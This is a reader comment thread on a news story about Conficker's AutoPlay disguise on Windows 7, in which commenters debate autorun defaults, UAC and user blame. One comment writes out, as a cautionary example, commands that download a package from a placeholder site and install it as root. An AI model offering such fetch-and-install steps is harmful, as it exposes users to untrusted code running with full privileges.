back to article Conficker Autoplay ruse gets teeth into Windows 7

Social engineering autoplay tricks work on early versions of Windows 7 as well as Vista, according to tests by security researchers. AutoPlay trickery As well as spreading by exploiting a weeks-old Microsoft vulnerability, the Conficker (Downadup) worm attempts to spread across network shares and to infect removable drives …

COMMENTS

This topic is closed for new posts.
  1. Sam York

    Modify how Autoplay works?

    Hopefully they will just turn it off altogether. I always have, on any Windows system that's supported it.

    Is it really much hardship to put a CD/USB stick in, then navigate to it in My Computer to explore or open it? I think not.

  2. Jared Vanderbilt

    I'd like to announce Windows 8 at this time

    Windows 8 is the greatest thing since sliced bread. It also include rudimentary security unlike the previous 7 versions of Windows.

  3. Tom

    @Sam York

    But MS dont want you to find out how to use a computer* - if you do you might just stop using theirs

    * I've been on Administrator courses and that holds true with them to!

  4. Anonymous Coward
    Anonymous Coward

    Oooo, sneaky.

    I might have fallen for that.

  5. Anonymous Coward
    Anonymous Coward

    Just curious..

    Looking at the screen shot, underneath the added 'Open folder to view files' it says 'Publisher not specified'.

    Why didn't they add in Microsoft as a publisher to make the illusion more complete, or is that controlled by something else?

  6. Anonymous Coward
    Anonymous Coward

    IF

    IF you allow removable media and

    IF you allow autorun and

    IF your users have administrative rights and

    IF your users have the right to run unauthorised executables

    Then you don't deserve to be an administrator.

    IF all those things are allowed by default then you probably shouldn't be selling your OS to home users.

  7. mattbt

    quite easy

    Its actually qute easy to make it claim that the open folder to view files is done by microsoft windows, i can probably post a screenshot.

    it was part of my coursework project last year, only mine didnt infect a computer with a virus...

  8. Nick Askew
    Coat

    Perhaps

    Windows 7 could, upon clicking on such an icon, send the screen kind of dark and pop up a message saying 'open folder to view files' needs your permission to continue ....

    I'll get my coat

  9. Kanhef
    Boffin

    Possible solution

    Have a single 'install or run program' option, with a suitable generic icon. Selecting that brings up a new window, which is where any programs the device offers to run are listed. Separating programs on the USB drive (or whatever) from normal Windows services should keep this sort of trick from working.

    This is a clever idea for a virus. Relatively savvy users often click on 'open folder...' without reading the entire window, and could easily choose the wrong one. If it opens the appropriate folder view after installing itself, it would be very hard to notice that anything unusual happened.

  10. Ash
    Gates Horns

    6 of one...

    This is a mix of three things:

    - Microsofts' ineptitude when it comes to basic security

    - Administrators' ineptitude in securing their kit properly

    - Users' ineptitude in not reading the line above the icon, which states quite clearly "Install or Run Program"

    ID 10T error all around.

  11. Anonymous Coward
    Stop

    Before fanbuys kick off...

    On a fresh install of Unbuntu, if I whack in a video clip it doesn't recognose it says. Codec not found, do you want to find one. Duuur OK

    Then I get do you want to install? Duuurrr OK

    And hey presto, I've blindly clicked a few links and installed something called a codec and clicked ok a few times and away it went and played my video.

    granted it may of copied my entire hard drive to a guy in botswana, but hey, this video is Keewwlll.

    If you make something easy to use, it becomes easy to trick people.

  12. Anonymous Coward
    Anonymous Coward

    @AC: Before fanbuys kick off...

    Apart from the fact that a default install of Ubuntu will only fetch the required software from the Ubuntu repositories, your argument does in fact hold water.

    The problem is that the argument holds such a small amount of water, an ant may dehydrate if relying on it!

  13. Stuart Castle Silver badge

    Why bother with Autorun

    Why do Microsoft persist with this idea that Autorun should be enabled by default?

    Yes, it makes things a little easier for the public (no having to hunt for something to run on the disc), but it also makes things a lot easier for Virus and Trojan writers. They just (as has been done here) make their Virus/Trojan look like a standard Windows option.

    So, Microsoft have introduced a massive security hole to reduce the number of mouse clicks to run a program from two or three to one.. Bargain..

    Hell, even Apple had the sense to remove Autorun support from Mac OS.

  14. Colin Millar
    Alert

    open folder = run

    But then windows will say "Do you want to run this prog" - so you know you are about to run a prog

    Unless you ticked the box to never ask you this question - in which case you deserve to be conficked

    2 things to kick out of windows

    1) Autoplay - some kind of automount maybe but not autoexecute

    2) The ability to turn off really important warnings like - confirm this executable is to run

  15. David Simpson
    Flame

    Anti-virus ?

    so an active virsu scanner doesn't detect this ? hmmm

  16. Anonymous Coward
    Flame

    @AC Re: @AC: Before fanbuys kick off...

    "a default install of Ubuntu will only fetch the required software from the Ubuntu repositories"

    And a default install of Windows will only fetch updates from updates.microsoft.com

    Doesn't mean that a program that autoruns and presents prompts that match the OS would have to abide by those rules.

    I believe that AC @ 15:56 was making the point that prompts that look like the OS don't necessarily originate from the OS.

    It because of people like AC @ 16:35 that we have these problems in the first place... assuming the OS will protect you is a very bad assumption!

    The only way to be sure that your computer can't be infected is to leave the power off.

  17. Ken Hagan Gold badge
    Gates Horns

    Is it just me...

    ...or is that dialog missing a big and ever-present "Don't do anything." option?

    I can imagine that Microsoft, or someone similarly deluded, might want to allow "custom actions", and I can imagine that the "close" box in the top right corner might have the effect I want, but surely it violates every UI guideline ever written to omit the "do nothing" or "go away" option here. Are new versions of Windows really this bad?

  18. Tone

    Just curious..

    Why didn't they add in Microsoft as a publisher to make the illusion more complete, or is that controlled by something else?

    They would need a microsoft certificate to do that..

  19. Anonymous Coward
    Anonymous Coward

    User Access Control

    Its finally useful for something!

    @@AC: Before fanbuys kick off..

    Doesn't matter how secure your OS, users are still going to press the buttons the computer tells them to. And since the OS does only install with the minimum there will be a lot of "You will need this as well" and users will get used to installing things like this

  20. James
    Flame

    Autorun == epic fail

    Autorun is possibly the most retarded idea in computing history. No software should ever automatically run *anything* from an untrusted source. If it's not a permanently installed piece of hardware then it's untrusted.

    M$ and admins should get a clue and disable it permanently.

  21. Fluffykins Silver badge

    @ AC ("Before fanbuys kick off... ")

    "it may of copied"

    of?

    OF?

    Do you mean "May've", as a contraction of "may have"?

  22. Anonymous Coward
    Anonymous Coward

    Simpler yet

    Either get the autorun.ini to deliver the payload direct (why give the choice?) or try an executable file that has a folder icon. The general user population won't have "hide known extensions" disabled and so would never see the .exe

    This is barely news. Not much more than "click me, I'm funny.exe"

  23. Roger Heathcote
    Flame

    @David Simpson

    "so an active virsu scanner doesn't detect this ? hmmm"

    HAhahahahaaaaaaa, that's too funny...

    Like the VXers don't use services like http://www.virustotal.com/ to make sure their zero days remain zero day for as long as possible.

    Antivirus is to infection prevention what the withdrawal method is to contraception yet people treat it like a magic cloak of invincibility and are baffled when they get spyware after surfing pron all day. More education needed.

  24. RW
    IT Angle

    Ubuntu repositories

    One difference from Microsoft.com: the Ubuntu repositories contain not just the OS, but most of the applications as well.

  25. UBfusion
    Alert

    Take precautions now!

    The best recommendations I have found so far is from the Canadian Cyber Incident Response Centre (CCIRC): http://www.publicsafety.gc.ca/prg/em/ccirc/2008/in08-007-eng.aspx

    The main idea is not only to prevent Windows from executing autorun.inf, but even *reading* it!

  26. zenkaon

    @AC 15:56 - ubuntu comments

    People seem to be missing the biggest difference. In Vista, UAC will come on and you click continue and download your whatever - just another button to click. In ubuntu, before it gets the codec it will ask you for your password. This is because ubuntu out-of-the-box does not let you log in as root (admin) and you need sudo access to install things/modify system settings.

    All home users of Vista I have ever seen just get pissed off with UAC as it is meaningless and just another button to click. Pretty much all home users log in as root (admin). Hey, at least in windows 7 you can turn UAC off.

    It doesn't surprise me this worm works in windows 7 - it's basically a faster vista with a bit of a KDE taskbar and no UAC. MS have to keep backwards compatibility and hence their architecture won't ever change that much, hence virus's will continue into windows 2020 and beyond.

  27. Anonymous Coward
    Anonymous Coward

    Non-issue

    So they've renamed the autorun thing to look like "Open files or folders" woo, aren't they clever.

    And when some dumbs**t user drops their ignorance onto the mouse button and clicks it, UAC will popup saying "this program is attempting to modify your system", then when dumbs**t user thinks that is normal they confirm UAC, and then when dumbs**t user presses "continue" their machine gets roasted.

    The fact it's titled as a "social engineering" trick says something. All IT systems are vulnerable to social engineering, regardless of their security practises, some users will trust anything.

    How many people have added repositories to Linux at the urging of a forum or webpage without fully checking the repository is legit? How many Windows converts to Linux would follow these instructions to the word if they've been told it'll give them a fun spinning cube with extra effects than their default repository version provides?

    1. wget http://www.somesite.com/repository.rpm

    2. su - c "rpm -Uvh repository.rpm"

    3. yum install this-is-not-a-virus-honest-gov

    Where's the story on that "vulnerability"? People who get infected with crap like this deserve more than they get, they deserve their BIOS flashed and to be removed from the computer user population.

    A few PCs later and they'll soon start learning computer security is as important as locking their car.

  28. Anonymous Coward
    Anonymous Coward

    Microsoft bitching

    "So, Microsoft have introduced a massive security hole to reduce the number of mouse clicks to run a program from two or three to one.. Bargain.."

    Hmm, so it's Microsoft's fault that the user has clicked on a link that looks like it opens the folder, but in fact is surrounded by text saying "Install or run program" and "Publisher not specified", and is in a separate section to the real link.

    There's nothing wrong with autorun in Vista. Users just need to pay more attention to what they're doing. OS manufacturers can't protect you from every eventuality - you have to take personal responsibility as well. And it's worth mentioning that UAC and running as a standard user would protect against losing your entire system.

  29. Test Man
    Stop

    New pic

    There's a new pic on BBC News showing the Autorun dialog. This time, the second line says "Published by Microsoft Windows". Now obviously it would never say anything like that if it came from Microsoft but it would definitely catch a lot of people out, even some of the more knowledgeable ones. Take a look.

    http://news.bbc.co.uk/1/hi/technology/7842013.stm

    Image is at http://newsimg.bbc.co.uk/media/images/45397000/jpg/_45397705_windows_vista_open_folder_to_view_files.jpg

    I'd like to know how they got text in that second line. I assumed that the executable had to be signed to get it in there, which you wouldn't normally be able to do if you were a dodgy virus writer.

  30. JC
    Gates Horns

    @ Microsoft bitching

    There certainly is something wrong with autorun when the average PC user, thinking their own flash drive is a trusted source, is allowed to infect the system via the default actions of an operating system specifically marketed for improved security.

    MS has done what they always do, add more things to click that annoy and slow down general computing, instead of disabling insecure features out of the box so that only those savvy enough to be mindful of what they've actively enabled, will be those who seek out and enable that feature.

    You really shouldn't have to take responsibility for clicking on what the OS pops up, it should not pop up any self-destruct buttons at all! It's like putting a "dump the oil pan" button in a car then not labeling it, with your mechanic arguing that anyone should take the time to trace that button through the dash to see that it's wired to a valve under the car, regardless of what the button is labeled to do, like "open trunk"... or folder in this case.

    Stop making excuses for defective software. Windows is targeted at the noobs, the interface changes speak volumes enough about that. With that target userbase, at the very least as much attention should be paid towards preventing self destruct buttons as the # of different looks for a clock on the sidebar.

    If you want autorun, by all means enable it from a default disabled setting.

  31. Owain
    Linux

    re su - c "rpm -Uvh repository.rpm"

    It would take quite Some social engineering to get me to type that in; or perhaps I could run the 100000 monky-o-tron I keep next to my keyboard.

    Anyway, isn't that the noise somebody makes when they've got a really bad frog in their throat.

  32. Anonymous Coward
    Anonymous Coward

    @JC

    My point is that there's only so much you can do to protect users from themselves, and that Microsoft is blamed whenever any virus infects Windows through any method.

    As for talk about a self-destruct button, surely any program that can be run can do this? Should Windows stop you running programs? Hell, the file might be called "Watch Screensaver.exe". If it does anything other than run a screensaver then is it Microsoft's fault that Windows let it run?

    Autorun is a feature for "noobs", as you say. How many "noobs" are going to be able to navigate through a directory structure and run the correct program on the CD or flash drive? At least it's better than the old autorun, where the program just ran anyway.

    There's a line between usability and security, and I think that autorun is on the right side of that line. There are enough safeguards to protect most people (how many people have been fooled by this anyway?). If you're worried about users not understanding all this then maybe they should have to pass a test before they can use their computers?

  33. Dave

    usual unix shite

    It's always only a matter of time before some unix tosser posts a command line to prove how ultra-mega-super-intelligent they are, and thus simultaneously proving why it will never replace Windows as the OS of choice. Unfortunately, high levels of tosspottery in their system prevent them from comprehending this. That is the unix paradox: thou will never replace Windows until thy command line be gone... but how can thou prance superiorly about without thine command line?

  34. Anonymous Coward
    Anonymous Coward

    @ usual unix shite

    "That is the unix paradox: thou will never replace Windows until thy command line be gone... but how can thou prance superiorly about without thine command line?"

    I used to think that too, but as I have become more interested in alternative to Microsoft OS, I have found that many of the more established BSDs/GNU-Linuxes communities don't want to replace Microsoft on the desktop, at least.

    I have to agree with some of the other people who have commented about this article that it is really up to the end-user to get off his/her lazy ass and learn something,or just don't own a computer or lose all your personal info to crims. Computers have been around long enough that people need to understand that they are not just another appliance. It's best to actually know something about the operation of the devices.

  35. Anonymous Coward
    Coat

    Ralph Nader: Computers Unsafe at Any Speed?

    AC wrote, "I have to agree with some of the other people who have commented about this article that it is really up to the end-user to get off his/her lazy ass and learn something,or just don't own a computer or lose all your personal info to crims. Computers have been around long enough that people need to understand that they are not just another appliance. It's best to actually know something about the operation of the devices."

    Ideally, yes. However, computers aren't marketed that way - they're marketed towards people who are barely smart enough to not pee on the floor indoors.

    Such clueless users will learn how to use computers safely at the same rate that idiots will learn how to stop crashing their cars. "Seatbelts save lives", as the saying goes, but cars didn't used to have seatbelts until whiners like Ralph Nader started making a big public stink about auto safety, eventually resulting in the automotive industry doing things to save idiots from themselves (saving bad drivers, and non-defensive drivers, from some Darwinian justice).

    Maybe we need a Ralph Nader type to address computer-OS security concerns, to keep idiot lusers from being a menace to others on the internet.

    Since that's not likely to happen anytime soon, the idiocy will continue.

    Nevertheless, it's often hopeless trying to explain to the average home PC user why they shouldn't run as Admin, etc etc... - their attitude is, "Well, the PC was set up like that when I first bought it, so it *must* be right, why would I change it?" :(

    So I would like to see *some* changes in the MS default stuff. Not to protect idiots from themselves, but to protect the rest of us from the idiots... or something like that.

  36. Andrew Metzger

    Simple security measure

    I understand the "logic" behind Microsoft not wanting to disable autorun, but there's still a very simple security feature that could be added - don't show the program icon and name. Instead of tiny words that say "Install or run program" and a big, clickable icon of the program, the box should make big, clickable text that reads "Install or run program," and maybe a tiny icon with text underneath it.

    If you take control away from the programs that want to run, it takes away their ability to influence the user and other programs. Why should a program be allowed to put its icon in an OS-owned dialog box?

This topic is closed for new posts.

Other stories you might like